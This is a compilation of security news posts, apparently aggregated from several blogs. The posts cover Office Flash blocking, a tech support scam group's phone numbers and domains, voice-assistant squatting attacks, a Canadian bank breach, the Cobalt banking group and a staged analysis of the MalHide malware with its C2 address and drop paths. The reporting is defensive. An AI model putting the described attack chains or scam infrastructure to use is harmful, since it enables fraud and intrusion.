Blocks for Flash and others coming to Office 365

If you’re a user of Microsoft Office products such as Word and Excel, you’re probably aware that they’ve been used as inroads for malware for a long, long time. But what about malware attacks without Macros? Sure. Macro malware for Macs? That, too. Malicious documents and spying tools? Danger, Will Robinson.

We have some good news and some bad news.

The good news is that monthly subscribers of Office 365 are getting some new protection in the fight against bogus attachments and malicious files; the bad news is the changes don’t currently apply to standalone versions of Office.

What’s being changed?

Silverlight, Flash, and Shockwave are all getting the chop. If you used to run a malware campaign based around use of these controls, that won’t be the case for much longer. A combination of seeing these features used in rogue campaigns, generally low legitimate use by product users (when was the last time you embedded Shockwave?), and a rapidly approaching end of the line for both Flash and Silverlight means it made a lot of sense for Microsoft to bring the hammer down.

As the Microsoft blog notes, this alteration makes no difference in situations where the control is activated outside of Office—for example, placing a Flash video into some content using the insert online video feature. Still, this is better than what’s gone before. Hopefully, Microsoft will add more protection for people not using the specified version.

Speaking of which…

Help, I’m not using the correct version!

Microsoft has you covered even if you’re not a monthly subscriber of Office 365, though you’ll have to do a bit of the shovel work yourself to shore up your defences. Roll up your sleeves, set aside a bit of spare time, and delve into this help article, which provides step-by-step instructions to lock things down. Some caveats here:

  1. You’ll have to do a spot of registry editing.
  2. Editing the registry and getting it wrong can cause all sorts of problems. Ensure you’ve made a backup before touching it. Better safe than sorry!

What kind of danger are we talking?

Things like rogue embedded Flash aren’t just theoretical. It’s something we see a lot of. For example, here’s an exploit making use of rogue Excel documents targeting South Koreans via Flash.

Here’s the booby-trapped Excel sheet in action, complete with hidden ActiveX object highlighted in white:

ActiveX

Click to enlarge

From here, it pings one of several websites with a unique identifier, the Flash version on board, and the Operating System version. If the stars align, then it’s exploit time with a side slice of Remote Administration Tool to boot.

This is a pretty sophisticated attack, but there’s plenty more out there that are as basic as they come. Either way, they get the results they need to infect an organisation.

Sounds nasty. When does the block go live?

Microsoft has said that the block rolls into place for Office 365 monthly users next month, with people using the Semi-Annual Targeted Channel and the Semi-Annual Channel receiving theirs in September 2018 and January 2019, respectively.

Of course, you can roll the blocks back yourself if you really want to (is that going to be a thing?) by following these instructions. Warning: once again, this involves some registry editing, so please make sure you’re comfortable before altering anything. Of course, if you have a monthly 365 package, it’s quite possible you’ll have an IT team performing said edits for your organisation anyway.

What else can we do to lock down Office files?

Quite a few things, actually. In more general attacks, scammers will try and convince potential victims to give Windows Admin permissions to rogue files; when that happens, it’s infection time. By the same token, they’ll try everything to convince someone to click through a bunch of “Enable Macro” prompts in an Office file. If you don’t need Macros, you should consider disabling them as soon as possible.

You can also apply a little elbow grease, and think long and hard before opening up an attachment sent your way. If you want to play it safe, always check with the sender before opening up a Word or Excel document. Don’t just stop at email confirmation; if the account has been compromised, then of course you’re going to receive a reply that says, “The attachment is definitely safe, honest.” Pick up the phone if need be. A little caution never hurt anyone, right?

For now, familiarise yourself with the upcoming changes, and have a think about whether or not you still need some of the controls penciled in for blocking. We’ll be keeping an eye out for the response to the changes, as demand for applying similar controls for other versions of Office is likely to be high. Fingers crossed, Microsoft will take heed and widen the rollout.

The post Blocks for Flash and others coming to Office 365 appeared first on Malwarebytes Labs.

FUD Crypters Recycling Old Malware

When I first started analyzing malware we stored it on floppy disks, so I know old malware when I see it. And, oddly enough, lately I’m seeing more and more of it – a phenomenon being driven, I believe, by the ongoing proliferation of FUD crypter services—FUD as in “Fully Undetectable.” I think this is evolving to the point where it will be an issue for the security industry. 

read more

A conversation with America Geeks

Thanks to NeeP for contributing significant research. You can check out NeeP’s YouTube channel here.

Malwarebytes has written quite a bit about tech support scammers, typically focusing on new scam techniques as they arise with new threat actor groups. But sometimes our research discovers scammers who persist with the same techniques, the same pitches, and the same IP abuse, no matter how many times we catch them.

We first published on America Geeks (then known as Geeks Technical Support) in 2015, noting their attempts to use Malwarebytes’ intellectual property to pose as us and defraud their customers. After a series of takedowns and abuse complaints, we revisited America Geeks in 2016—still using Malwarebytes image assets, still scamming.

And lastly, in March, Malwarebytes Labs researchers found them again using Malwarebytes to sell their scam, this time targeting French users. We were content to continue publishing on America Geeks indefinitely, but then they decided to open a ticket with the Malwarebytes help desk.

In further social media comments that have since been deleted, this person identified as being associated with America Geeks, and was quite concerned about our 2016 post on the company. We did not follow up.

On May 1, our customer support team got a phone call from “Kevin Nash” at the “Better Business Bureau” who informed us that America Geeks was no more, and our 2016 blog post was causing problems for someone who had bought their infrastructure. (At the time, their website was still up and not at all defunct.)

Why the Better Business Bureau would serve as an intermediary between a defunct business’ CEO in one country and a tech company in another was left unexplained. Why “Kevin Nash” had an Indian cell phone number and a heavy Indian accent was left unexplained. We did not follow up.

He provided contact details that we have redacted.

“Kevin Nash” then contacted us as the personal attorney of the former America Geeks CEO. He alleged that Kunal Bansal of America Geeks was at risk of physical harm from our 2016 blog post, and needed us to take it down. Further, America Geeks was shut down, and therefore no longer a threat to anyone. Given the seriousness of the claims, we followed up. Here’s the transcript for three calls conducted with Kevin Nash:

Call one

America Geeks (AG): Hey, this is Kevin. How you doing buddy?

Malwarebytes (MWB): Oh, is this Kevin…Kevin Nash?

AG: Kevin Nash.

MWB: Okay, I’m sorry. Are you calling—are you from the Better Business bureau? Cause I think thats what the message I had gotten said.

AG: Uh…no…no no. I’m not from Better Business Bureau, I’m with the legal team with the company that the review is about.

MWB: You’re with the legal team? What company is it? Geek? Geeks? Is it…

AG: Yeah. Okay, so the thing is, that Geeks company is closed. Alright?

MWB: Okay.

AG: That geek company is closed. That business doesn’t exist anymore, and no business associated with that article that is, uh, open. Like we have closed that business. My…self called BBB because my friend works there. It could be that he called because I interested him to. And that probably…

MWB: Okay. Who am I speaking with? Is this Kevin Nash?

AG: Yeah, that’s right. My client owns this company, and uh…that company doesn’t exist anymore. So, uh…his personal information is there on that post. And uh, he got critically attacked by someone as well, due to the, you know, the information there on the post. People got to know about him, knows his business, everything related to that business, now he is, uh, concerned regarding his privacy, you know?

MWB: And What is your client’s name?

AG: Kunal Bansal.

MWB: Okay, um, I’m a little confused. If the company is closed, then what—were you planning on reopening the company? Is that why you want to get rid of the post?

AG: No. The problems of getting that post removed is that his personal details are mentioned on that post. Even the photo is there on the post.

MWB: Okay, I’ll tell you what. If you can send me, send me all the information in the email, and what it is you want us to do, I’ll see what I can do for you. Do you have a phone that doesn’t go to voicemail? You’re a lawyer? And in what state are you practicing?

AG: I’m in California. Marina Del Ray?

MWB: Can you send me the information of your law firm? And um, all the information of the client, and I’ll get back to you as soon as I get that information.

AG: Thank you so much.

MWB: Thank you.

Call two

AG: [Inaudible] This is Kevin Nash.

MWB: Hey yeah, I can hear you. You’re the lawyer for Mr. Bansal?

AG: Kunal Bansal. Yeah, that’s right.

MWB: Okay, what’s the name of your law firm again?

AG: USA Legal Services

MWB: US?

AG: It’s USA Legal Services

MWB: Okay and you’re out of, uh, California?

AG: Yep.

MWB: Do you have an address there in California?

AG: That would be [REDACTED]

MWB: Do you have an office number?

AG: Yes, I have office number, and this is my office number.

MWB: Your office number is the 323?

AG: Yeah thats my personal, direct line in office.

MWB: Has [Kunal Bansal] made any restitution? On the people that he scammed?

[America Geeks hangs up.]

Call three

AG: Yeah, I’m so sorry, I don’t, the line got blank.

MWB: Well, that’s okay. Okay, so was there any restitution made on behalf of your client?

AG: Well, uh, I’ll need to check once with the department there, and I’ll get back to you, certainly. And I’ll have something emailed to you, within minutes. Alright? [NOTE: Mr. Nash never provided any evidence of institution, or explanation of who he was checking with if the company was shut down.]

MWB: Okay. Uh, one other question. Okay, so the address you gave me, [REDACTED]. I can’t find a USA Legal Services at that address. Is that the correct address?AG: That should be [REDACTED SECOND ADDRESS]

MWB: Oh now it’s [REDACTED]?

AG: Talking to me like I’m some criminal or something…

MWB: Listen—I deal with complaints and I’m trying to clarify who you are. I mean, I get a phone call. First of all, the phone call stated that you are Kevin Nash from Better Business Bureau. Now when I call you back you’re Kevin Nash. . .and you’re the lawyer, and then you’re giving me the address for a law firm that doesn’t exist.

AG: [Silence.]

MWB: So yes, I have some reservations that I’m not dealing with a legitimate person. Your emails are coming from a different person altogether. They’re not coming from a law office. They’re coming from “Naresh Kumar.”

AG: I got you, I got you. I have a, let me, let me send you an email.

MWB: Can you explain to me why that I’m getting emails from Naresh Kumar, and you’re saying you’re Kevin Nash?  And you’re a lawyer?

AG: [pause] That’s right. He’s the person who’s dealing with me through Mr. Kunal Bansal. And the reason why you’re not getting any email from my address is because I was having him do that. Now I do have access to my email and if you’ll give me like two minutes, then…restitution is what you’re asking for? I’ll send it to you through my official email wherein I will have my company phone number, as well as my number, as well as company [inaudible]

MWB: What’s your company phone number?

AG: That will be 844-676-LOAN. L-O-A-N. [NOTE: Searches on this number returned hits for mortgage loans and student debt consolidation. We did not redact the number because we believe it to be associated with multiple fraudulent businesses. All websites with this number are now down.]

[Crosstalk]

AG: There’s an alternate too, it’s [REDACTED.]  Law.

MWB: Okay, well, if you can send me the information, Mr. Nash?

AG: I’ll send it to you from a [inaudible] email address this time, alright?

MWB: Okay. Alright, I’ll be waiting for your email address.

Digging into America Geeks ops

After speaking with Mr. Nash, we decided to take a look at how extensive America Geeks operations really were. First and foremost, he provided an Indian cell phone number that popped in Google Cache as a corporate contact on the site https://shopping4kart[.]com.

Passive DNS for that site revealed extensive likely tech support scams.

A survey of historical victim reports using overlapping phone numbers revealed the following business names:

  • America Geeks
  • Geeks Technical Support
  • Mark Software Private Limited, USA
  • Technology LLC
  • Blue Alpha
  • IT Pvt Ltd
  • USA Legal Services LLC

Independent researchers provided us with the following list of phone numbers used by the threat actor group:

  • 18776589988
  • 18776941838
  • 18882466988
  • 18883502808
  • 18884273330
  • 18884898307
  • 18885882055
  • 18886100490
  • 18886608571
  • 18887590763
  • 18887789143
  • 18887799348
  • 18889127011
  • 18889597430
  • 18776941838
  • 18558870097
  • 18446709167
  • 18886100490
  • 18445714235
  • 18887549063
  • 18889597430
  • 18887789193
  • 18552174635
  • 18882955166
  • 18882954668

[NOTE: Numbers are provided for historical purposes only. Scammers change numbers frequently.]

The America Geeks website was in fact down at the time of Mr. Nash’s phone call. But scammers frequently maintain extensive domain holdings to better shift operations when one domain receives too much attention. America Geeks make frequent use of browser lock screens, but also have a fair number of fake corporate sites to attract natural traffic. The domains used over their lifespan include, but are not limited to:

  • https://www.usatechnologyllc.com
  • http://www.usalegalservices.com
  • https://www.marksoftwaresystems.com
  • https://www.geekstechnicalsolutions.com
  • www.geekshelp123.me
  • www.geekshelp1.me
  • www.itechwyre.com
  • http://www.geeksupport123.me
  • http://geeksworld.co/geeks-support-for-epson.php
  • www.americageeks.com
  • www.geekamericas.com
  • www.americageekpayment.com
  • www.americageekssurvey.com
  • www.geekshelp.me
  • https://engenius-tech-support.com
  • www.geeksoftwareexperts.com
  • www.usatechsupportltd.com
  • www.rarebitlogistics.com
  • https://geeksfrance.com
  • https://officeactivation.net
  • www.itechhelpsupport.com
  • https://printer-tech-support-help.com
  • https://kaspersky-customer-care.com
  • https://comodo-support-help.com
    https://lexmark-support-help-247.com
  • https://best-buy-phone-number.com

[NOTE: A number of these domains are historical, and may be down or transferred to a legitimate owner since publication.]

Concluding a review of their historical infrastructure, we found tech support scam complaints relating to Kunal Bansal–related properties dating back to 2012. Although America Geeks’ website is down at the time of writing, we find it unlikely that their scamming has ceased entirely. Instead, it has most likely shifted to a new company name. Given that they had resources sufficient to target users in multiple countries, in their own language, America Geeks appears to have been extremely profitable, and we advise users to be wary of any new company name used by the America Geeks proprietors.

For more on tech support scams and how to stay safe, see the following blog, or check out our forums to report new scam sites and numbers.

The post A conversation with America Geeks appeared first on Malwarebytes Labs.

Researchers discover vulnerabilities in smart assistants’ voice commands

Virtual personal assistants (VPA), also known as smart assistants like Amazon’s Alexa and Google’s Assistant, are in the spotlight for vulnerabilities to attack. Take, for example, that incident about an Oregon couple’s Echo smart speaker inadvertently recording their conversation and sending it to a random contact. Or that time when the Alexa started laughing out of the blue. Indeed, something has to be done about these hacks, whether they’re by accident or not.

Earlier this month, researchers from Indiana University, the Chinese Academy of Sciences, and the University of Virginia found exploitable weaknesses in the VPAs above. Researchers dubbed the techniques they used to reveal these weaknesses as voice squatting and voice masquerading. Both take advantage of the way smart assistants process voice commands. Unsurprisingly, these also exploit users’ misconceptions about how such devices work.

How smart assistants work

VPA services used in smart speakers can do what they’re created to do with the use of apps called “skills” (by Amazon) or “actions” (by Google). A skill or an action provides a VPA additional features. Users can interact with a smart assistant via a virtual user interface (VUI), allowing them to run a skill or action using their voice.

Entrepreneurs, with the help of developers, are already taking advantage of creating their own voice assistant (VA) apps to cater to client needs, making their services accessible in the voice platform, or merely introducing an enjoyable experience to users.

As of this writing, the smart assistant apps market is booming. Alexa skills alone already has tens of thousands, thanks to the Alexa Skill Kit. Furthermore, Amazon has recently released Alexa Skill Blueprints, making skills creation easy for the person who has little to no knowledge of coding.

Unfortunately, the availability of such a kit to the public has made abuse by potential threat actors possible, making the VPA realm an entirely new attack vector. If an attack is successful—and the study researchers conducted proved that it can be—a significant number of users could be affected. They concluded that remote, large-scale attacks are “indeed realistic.”

Squatters and masqueraders

Voice squatting is a method wherein a threat actor takes advantage or abuses the way a skill or action is invoked. Let’s take an example used from the researchers’ white paper. If a user says, “Alexa, open Capital One” to run the Capital One skill, a threat actor can potentially create a malicious app with a similarly pronounced name, such as Capital Won. The command meant for the Capital One skill is then hijacked to run the malicious Capital Won skill instead. Also, as Amazon is now rewarding kids for saying “please” when commanding Alexa, a similar hijacking can occur if a threat actor uses a paraphrased name like Capital One please or Capital One Police.

“Please” and “police” may mean two totally different things to us, but for current smart assistants, these words are the same, as they cannot correctly recognize one invocation name over another similar-sounding one.

Suffice to say, VPAs are not great at handling homophones.


Read: Out of character: Homograph attacks explained


Voice masquerading, on the other hand, is a method wherein a malicious skill impersonates a legitimate one to either trick users into giving out their personal information and account credentials or eavesdrop on conversations without user awareness.

Researchers identified two ways this attack can be made: in-communication skill switch and faking termination. The former takes advantage of the false assumption that smart assistants readily switch from one skill to another once users invoke a new one. Going back to our previous example, if Capital Won is already running and the user decides to ask “Alexa, what’ll the weather be like today?”, Capital Won then pretends to hand over control to the Weather skill in response to the invocation when, in fact, it is still Capital Won running but this time impersonating the Weather skill.

As for the latter, faking termination abuses volunteer skill termination, a feature wherein skills can self-terminate after delivering a voice response such as “Goodbye!” to users. A malicious skill can be programmed to say “Goodbye!” but remain running and listening in the background for a given length of time.

But…I like my smart assistant!

No need to box up your smart speakers and send them back if these vulnerabilities worry you. But it is essential for users to really get to know how their voice assistant works. We believe that doing so can make a significant difference in maintaining one’s privacy and protecting from attack.

“Making devices, such as Alexa, responsible for important systems and controls around the house is concerning, especially when evidence emerges that it’s able to turn a simple mistake into a potentially serious consequence,” our very own Malware Intelligence Analyst Chris Boyd said in an interview with Forbes.

Smart assistants and IoT, in general, are still fairly new tech, so we expect improvements in the AI, and the security and privacy efforts within this sector. Both Amazon and Google have claimed they already have protections against voice squatting and voice masquerading.

While it is true that the researchers had already met with both firms to help them understand these threats further and offer them mitigating steps, they remain skeptical about whether the protections put in place are indeed adequate. Only time will tell.

The post Researchers discover vulnerabilities in smart assistants’ voice commands appeared first on Malwarebytes Labs.

Two major Canadian banks hacked and blackmailed

While the US was celebrating Memorial Day on Monday, Canada was dealing with an unusual and major data breach affecting two popular financial institutions: Simplii Financial and the Bank of Montreal (BMO).

The CBC broke the story and updated it throughout the day to mention that at least 90,000 customers were affected by this attack which the banks say they became aware of on Sunday, just one day prior.

While at first the details were scarce, the CBC later confirmed that the perpetrators had threatened to release their data trove publicly unless the banks agreed to pay them a 1 million dollar ransom on May 28th, just before midnight.

BMO has said that they did not pay the ransom and instead is focusing on helping and protecting its customers. Both banks are offering support and in particular credit monitoring services to the victims of this incident.

This hack is noteworthy for targeting two major Canadian financial institutions at the same time and exposing extremely sensitive personal information which, unlike a password, cannot be changed. Although the data has now lost some of its immediate value, the attackers may decide to dump all the information publicly or sell it to the highest bidder.

Breaches leave users scared and frustrated because people know their data may end up being stolen in a way that is out of their own control. Having said that, certain measures can contain the damage and can be readily applied. For one, using strong and unique passwords is absolutely critical so that hackers cannot easily compromise your other accounts.

Many online services have security questions as part of the authentication process that are problematic in themselves. Rather than answering ‘blue’ to the question about your favourite colour, be a little more creative and come up with a full sentence, or even something that has nothing to do with colours at all. Finally, whenever possible, you should enable two-factor authentication as it provides an additional layer of security to the otherwise weak password-only approach.

The post Two major Canadian banks hacked and blackmailed appeared first on Malwarebytes Labs.

BackSwap Trojan exploits standard browser features to empty bank accounts

Creating effective and stealthy banking malware is becoming increasingly difficult, forcing malware authors to come up with innovative methods. The latest creative burst in this malware segment comes from a group that initially came up with malware stealing cryptocurrency by replacing wallet addresses in the clipboard. About the BackSwap banking malware “To steal money from a victim’s account via the internet banking interface, typical banking malware will inject itself or its specialized banking module into … More

The post BackSwap Trojan exploits standard browser features to empty bank accounts appeared first on Help Net Security.

The Cobalt Hacking crew is still active even after the arrest of its leader

Group-IB has released a new report on Cobalt group’s attacks against banks and financial sector organizations worldwide after the arrest of its leader.

Threat intelligence firm Group-IB published an interesting report titiled “Cobalt: Evolution and Joint Operations” on the joint operations of Cobalt and Anunak (Carbanak) groups after the arrest of the leader in March 2018.

Researchers reported that the most recent campaign associated with Cobalt group is dated May 23, 2018 and aimed at banks in Russia and CIS countries.

The analysis of the content of the spear phishing messages suggest attackers are also targeting western financial organizations.

Interestingly, the spear-phishing messages sent by the hackers were disguised as fake Kaspersky security alerts.

“The first wave of the phishing campaign was tracked on May 23 at 13:21 Moscow time. For the first time in Cobalt’s practice, phishing emails were sent acting as a major anti-virus vendor.” reads the press release issued by Group-IB.

“The user received a “complaint” in English that activity was recorded from their computer that violated existing legislation. The recipient was asked to read the attached letter and provide detailed explanations. If the response was not received within 48 hours, the “anti-virus company” threatened to impose sanctions on the recipient’s web resources. In order to download the letter, the user was asked to follow the link, which would then infect the Bank employee’s computer.”

Cobalt attack

Group-IB attributed the attack to Cobalt due to the involvement of Coblnt Trojan, a malware exclusively observed in campaigns of the threat actor.

The phishing emails were sent the domain “kaspersky-corporate.comthat was registered by the same person that registered other domains used by the Cobalt group for its campaigns.

Experts highlighted the high quality of phishing messages, the text in perfect English and it is stylized as a “legal complaint”, while the fake website kaspersky-corporate.com also has a high level of quality. This quality suggests a possible collaboration of Cobalt with other criminal gangs like Anunak.

The report also analyzed past the attacks aimed at SWIFT system, researchers concluded that the advanced understanding of banking technology and money laundering capabilities was the result of a collaboration with other threat actors.

“Following the 2016 SWIFT incidents, attacks involving interbank transfer systems ceased and Cobalt switched focus to other critical systems in banks such as ATMs. This was followed by Card Processing attacks which provide a safer withdraw process for Money Mules.” continues the report.

“Cobalt’s first major attack was against First Bank in Taiwan where attackers managed to steal over $2 million dollars. Following this, Cobalt was then successful in targeting the card processing systems at a bank in Kazakhstan taking over two months to prepare their attack and successfully steal $600,000 through card processing. These attacks were then perfected and intensified in 2017 across tens of incidents.”

The Cobalt group has also conducted  ‘supply chain’ attacks like the one powered in February 2017 against a system integrator to later hit organizations in Russia and former CIS countries. In 2017 Cobalt infiltrated at least other four system integrators.

Cobalt’s attacks also hit non-typical targets like the one that in March 2017 hit a company providing electronic wallets and payment terminals.

Cobalt group always modified its tools across the years, it also used a modified version of Petya Ransomware to erase evidence of the attack after a failed attempt to steal from their ATM systems.

“Cobalt is still active: its members continue attacks on financial organizations and other companies worldwide,” comments Dmitry Volkov, Group-IB CTO. “We have technical proof of collaboration between Cobalt and Carbanak. In order to enable business and market regulators to take preventative measures against these criminals, we provide our customers indicators to protect them from phishing, identify the infrastructure and methods still used by these criminals.”

Pierluigi Paganini

(Security Affairs – hacking, cybercrime)

The post The Cobalt Hacking crew is still active even after the arrest of its leader appeared first on Security Affairs.

Security Affairs: The Cobalt Hacking crew is still active even after the arrest of its leader

Group-IB has released a new report on Cobalt group’s attacks against banks and financial sector organizations worldwide after the arrest of its leader.

Threat intelligence firm Group-IB published an interesting report titiled “Cobalt: Evolution and Joint Operations” on the joint operations of Cobalt and Anunak (Carbanak) groups after the arrest of the leader in March 2018.

Researchers reported that the most recent campaign associated with Cobalt group is dated May 23, 2018 and aimed at banks in Russia and CIS countries.

The analysis of the content of the spear phishing messages suggest attackers are also targeting western financial organizations.

Interestingly, the spear-phishing messages sent by the hackers were disguised as fake Kaspersky security alerts.

“The first wave of the phishing campaign was tracked on May 23 at 13:21 Moscow time. For the first time in Cobalt’s practice, phishing emails were sent acting as a major anti-virus vendor.” reads the press release issued by Group-IB.

“The user received a “complaint” in English that activity was recorded from their computer that violated existing legislation. The recipient was asked to read the attached letter and provide detailed explanations. If the response was not received within 48 hours, the “anti-virus company” threatened to impose sanctions on the recipient’s web resources. In order to download the letter, the user was asked to follow the link, which would then infect the Bank employee’s computer.”

Cobalt attack

Group-IB attributed the attack to Cobalt due to the involvement of Coblnt Trojan, a malware exclusively observed in campaigns of the threat actor.

The phishing emails were sent the domain “kaspersky-corporate.comthat was registered by the same person that registered other domains used by the Cobalt group for its campaigns.

Experts highlighted the high quality of phishing messages, the text in perfect English and it is stylized as a “legal complaint”, while the fake website kaspersky-corporate.com also has a high level of quality. This quality suggests a possible collaboration of Cobalt with other criminal gangs like Anunak.

The report also analyzed past the attacks aimed at SWIFT system, researchers concluded that the advanced understanding of banking technology and money laundering capabilities was the result of a collaboration with other threat actors.

“Following the 2016 SWIFT incidents, attacks involving interbank transfer systems ceased and Cobalt switched focus to other critical systems in banks such as ATMs. This was followed by Card Processing attacks which provide a safer withdraw process for Money Mules.” continues the report.

“Cobalt’s first major attack was against First Bank in Taiwan where attackers managed to steal over $2 million dollars. Following this, Cobalt was then successful in targeting the card processing systems at a bank in Kazakhstan taking over two months to prepare their attack and successfully steal $600,000 through card processing. These attacks were then perfected and intensified in 2017 across tens of incidents.”

The Cobalt group has also conducted  ‘supply chain’ attacks like the one powered in February 2017 against a system integrator to later hit organizations in Russia and former CIS countries. In 2017 Cobalt infiltrated at least other four system integrators.

Cobalt’s attacks also hit non-typical targets like the one that in March 2017 hit a company providing electronic wallets and payment terminals.

Cobalt group always modified its tools across the years, it also used a modified version of Petya Ransomware to erase evidence of the attack after a failed attempt to steal from their ATM systems.

“Cobalt is still active: its members continue attacks on financial organizations and other companies worldwide,” comments Dmitry Volkov, Group-IB CTO. “We have technical proof of collaboration between Cobalt and Carbanak. In order to enable business and market regulators to take preventative measures against these criminals, we provide our customers indicators to protect them from phishing, identify the infrastructure and methods still used by these criminals.”

Pierluigi Paganini

(Security Affairs – hacking, cybercrime)

The post The Cobalt Hacking crew is still active even after the arrest of its leader appeared first on Security Affairs.



Security Affairs

Security Affairs: MalHide Malware uses the compromised system as an eMail relay

The cybersecurity experts Marco Ramilli analyzed a new sample of malware dubbed MalHide that implements a quite new attack path to use the compromised system as eMail relay in order to hide the attacker networks.

Today I’d like to share an interesting (at least to me) analysis on a given sample. I have called this sample MalHide but you will see “why” only at the end of my post :D. I believe this is a quite interesting Malware because it firstly implements several obfuscation stages by using different obfuscation techniques and secondly it implements a quite new attack path (not new per-se but new on opportunistic malware families) where the attacker doesn’t want to steal information and/or compromise a system for possession and/or destruction but the attacker uses the compromised system as eMail relay in order to hide the attacker networks. It is amazing to figure out that attackers are primary moving on fraud direction. For example, having a successful privilege access on the victim machine, the attacker might decide to perform several malicious actions, but among all the choices, he decides to spawn an SMTP relay to send anonymously fraud emails. Based on my past experience this is quite wired, isn’t it ?!
Disclaimer: I’m not going into details on every step since I’m not writing a tutorial but mostly I’d like to prove that threats are getting more and more complex on relatively short time and that attack path is quite unique at least for my personal experience.
Everything started with an email attachment. “Nuovo Documento.doc” is its name and it is able to bypass every single AntiSpam and AntiMalware engine the target had. The following image shows the initial stage where the “.DOC” file seems to be benign but not compatible with the running Microsoft Word instance.
MalHide Sample as it looks like on opening. Stage 1
The sample presents some macro functions on it. Many junk functions have been injected on the VBA side in order to make life harder to reverse engineers, but fortunately, the great Microsoft VBA Editor included in the Microsoft Office suite implements a useful debugger. The analyst observes that the AutoOpen() function is preserved and filled by code. It took almost 3 seconds to figure out it was a malicious code. The following image shows the Microsoft VBA Editor debugging view where is possible to appreciate the variable qZbTUw containing a PowerShell encoded code. Here we are! The second stage is approaching the victim.
Stage 2. A running instance of PowerShell invoked by VBA
The PowerShell code was Base64 Encoded and additionally obfuscated through “variable mess”. This technique is quite common for  javascript devs since the code they develop runs on client side and obfuscating code is used technique to protect (sort of) the written code, but on the given scenario it looks like a simple implementation of FileLess Staging, where the attacker runs a PowerShell script directly from memory without saving it on HD, in such a way the victim does not need to enable the “running PowerShell from file” Microsoft register key and it’s much harder from AntiVirus detect the infection stage. Then the script fires it on following the infection. Powershell ISE helps us to reverse the dropped payload. The following images show the decoding process: from the single line of obfuscated code to dropping URLs. I know, it’s almost impossible to see the images since they look like small, but please click on them to make a bigger view,  if you wish.
Stage 3. Decoding Powershell Drop-and-Execute
Stage 3. Decoded Powershell Drop-and-Execute
The analyst is now able to identify the dropping websites and block them (please refer to IoC section)! The executed actions are quite standard. From an array of dropping website lets cycle over them and take the one who drops! The cycling policy could differ from sample to sample since they could use a pseudo-random seed generator or adopting an increment rotation or a round robin rotation and son. For this analysis is not interesting cycling policy at all since we decoded all the possible dropping files. The Powershell command gets the 52887.exe from an external source (dropping websites) and places it on C:\Users\Public\52887.exe. Finally, it runs it. Stage 4 has began, a new PE sample has been executed. The following image shows the Stage 4 dropping another stage into C:\Windows\SysWOW64\fonduewwa.exe. Fortunately, this stage drops the code from itself without getting on the network side. The fonduewwa.exe is then executed.
Stage 4. 52887.exe dropping to C:\Windows\SysWOW64\fonduewwa.exe
The new stage (Stage 4) performs the following steps:
1) It fires up services which act as SMTP client.
2) Connects to a Command and Control which provides emails addresses, SMTP relays, and eMails body to be sent.
3) Sends eMail to exploit BeC communications.
The following images show the Command and Control address. The first image shows the used Windows API while the second one addresses the opened connections directly on the infected machine.
Command and Control IP Address (click to make it bigger)
Command and Control DNS resolution (click to make it bigger)
The Command and Control (c2) listen to: c-67-176-238-209.hsd1.il.comcast.net which today resolves in: 67.176.238.209. The C2 seems to answers to http queries having a specific set of cookies as the following image shows. The C2 crafted and rebuilt communication, made possible by reconstructing cookies from sniffed internal communications, gets back from C2 a kB of encoded data.
Command and Control Communication through HTTP

From C2 comes actions, victims addresses, SMTP servers, and passwords. The sample connects to a given SMTP relays, it authenticates itself and sends email to the victims. The following images prove that the attackers have plenty of credentials to SMTP relays around the globe.

MalHide Connection to real SMTP relays
As now I will not disclose Username e Password for getting access to SMTP relays, but if you can prove to be the owner (or at least to be working for the company owning) of one of them let’s have a chat on that, many interesting things are happening into your network. The emails sent from the analyzed sample are targeting specific victims. It was pretty easy to figure out that we were facing a new attack vector! This attack vector looks like a BeC (or CEO Scam) to specific targets. For those of you not familiar with this attack I am copying the definition provided by SANS (here).
Cyber criminals have developed a new attack called CEO Fraud, also known as Business Email Compromise (BEC). In these attacks, a cyber criminal pretends to be a CEO or other senior executive from your organization. The criminals send an email to staff members like yourself that try to trick you into doing something you should not do. These types of attacks are extremely effective because the cyber criminals do their research. They search your organization’s website for information, such as where it is located, who your executives are, and other organizations you work with. The cyber criminals then learn everything they can about your coworkers on sites like LinkedIn, Facebook, or Twitter. Once they know your organization’s structure, they begin to research and target specific employees. They pick their targets based on their specific goals. If the cyber criminals are looking for money, they may target staff in the accounts payable department. If they are looking for tax information, they may target human resources. If they want access to database servers, they could target someone in IT.Once they determine what they want and whom they will target, they begin crafting their attack. Most often, they use spear phishing. Phishing is when an attacker sends an email to millions of people with the goal of tricking them into doing something, for example, opening an infected attachment or visiting a malicious website. Spear phishing is similar to phishing; however, instead of sending a generic email to millions of people, they send a custom email targeting a very  small, select number of people. These spear phishing emails are extremely realistic looking and hard to detect. They often appear to come from someone you know or work with, such as a fellow employee or perhaps even your boss. The emails may use the same jargon your coworkers use; they may use your organization’s logo or even the official signature of an executive. These emails often create a tremendous sense of urgency, demanding you take immediate action and not tell anyone.”

Following few examples of the sent emails coming from C2 and delivering through the analyzed MalHide sample.

Here we are, another email has been sent, another Malware has been thought and developed, another analysis I’ve been made but this time it looks like the “Malware economy” is seriously moving to fraud, there is much money respect to information stealing which is an ancient and romantic way to attack victims. Is this attack a significative example expressing the will of the new underground economy? Is this attack a small and silent change of paradigm, where previously the attacker was interested in your data in order to sell them but now he gets more interested on fraud third parties (such as companies) through you? I do not have such answer here.

Ok, now it’s time to explain why I called this Malware MalHide. Well, it’s a complex Malware, it hides several times BUT most important it has been developed to hide the attacker from sending emails in a way that is not possible to trace back the Attacker IP from the attack path. So I believe MalHide would be a nice name 😀

Further details on the MalHide malware, including the IoCs are reported in the original analysis published by Marco Ramilli

https://marcoramilli.blogspot.it/2018/05/malhide-interesting-malware-sample.html

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

 

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cyber security experiences by diving into SCADA security issues with some of the most biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence center I’ve ever experienced ! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – MalHide, malware)

The post MalHide Malware uses the compromised system as an eMail relay appeared first on Security Affairs.



Security Affairs

MalHide Malware uses the compromised system as an eMail relay

